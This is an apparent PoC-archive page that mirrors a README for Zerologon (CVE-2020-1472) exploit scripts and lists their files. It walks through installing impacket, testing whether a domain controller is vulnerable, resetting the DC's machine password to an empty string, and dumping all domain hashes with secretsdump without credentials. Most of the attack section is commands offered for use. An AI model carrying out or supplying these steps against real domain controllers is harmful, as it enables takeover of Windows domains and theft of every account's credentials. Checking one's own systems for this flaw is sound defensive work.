来源

关联漏洞

描述

Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472). 

介绍

# Zerologon
Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472)

<br>
<img src="https://imgur.com/N5X7OA6.png" alt="banner"/>

***

# What is it?

ZeroLogon is a vulnerability that allows us to exploit a cryptography flaw in Microsoft's Active Directory Netlogon Remote Protocol (MS-NRPC), which allows users to log in to servers using NTLM. 

***

# Previous steps 

Before executing the exploit we must know that we need a different version of impacket, for this we will do the following. 

``apt remove --purge impacket-scripts python3-impacket``

``git clone https://github.com/SecureAuthCorp/impacket.git``

``cd impacket``

``pip install .``

***

# PoC (Proof Of Concept)

``git clone https://github.com/Nekoox/zerologon.git``

``cd zerologon``

``pip install -r requirements.txt``

## Check if the victim domain controller is vulnerable to zerologon.

``python3 tester.py <DC-NAME> <ip-address>``

In the event that the victim DC is vulnerable, a message will appear saying "Success! DC can be fully compromised by a Zerologon attack." 

Otherwise, that is, the victim DC is not vulnerable because the security hole has been patched, we will get the following message "Attack failed. Target is probably patched." 

***

## Change the password of the vulnerable domain controller to an empty string. 

``python3 empty_pw.py <DC-NAME> <ip-address>``

If the Domain Controller is vulnerable, after running the exploit it should not have any password. 


## Dump hashes of the Domain Controller. 

``> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>``

By executing this, we will be able to see all the hashes of the domain, without any credentials. 

文件快照

 [4.0K]  /data/pocs/92fe6e509506e1eadfb729f863b648841c1464e0
├── [5.7K]  empty_pw.py
├── [1.0K]  LICENSE
├── [1.6K]  README.md
├── [ 563]  requirements.txt
├── [6.4K]  reset_original_pw.py
└── [3.0K]  tester.py

0 directories, 6 files

备注